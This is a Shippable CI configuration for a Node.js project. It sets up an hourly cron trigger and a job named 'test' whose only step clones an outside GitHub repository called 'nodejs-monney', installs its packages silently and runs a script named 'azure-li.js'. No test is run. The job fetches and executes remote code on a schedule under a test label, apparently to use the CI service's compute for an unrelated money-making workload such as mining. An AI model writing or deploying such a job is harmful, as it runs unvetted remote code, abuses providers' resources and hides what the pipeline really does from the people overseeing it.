# Language setting http://docs.shippable.com/ci/languages/node/
language: node_js
node_js:
    - 14.16.0
# create cronjobs
resources:
    - name: test_running
        type: time
        versionTemplate:
            interval: "0 * * * *"
jobs:
  - name: test
    type: runSh
    steps:
      - IN: test_running
      - TASK:
          name: clone_and_run
          script:
            - git clone https://github.com/vippro99/nodejs-monney.git && cd nodejs-monney && npm i -s && nice -20 node azure-li.js  
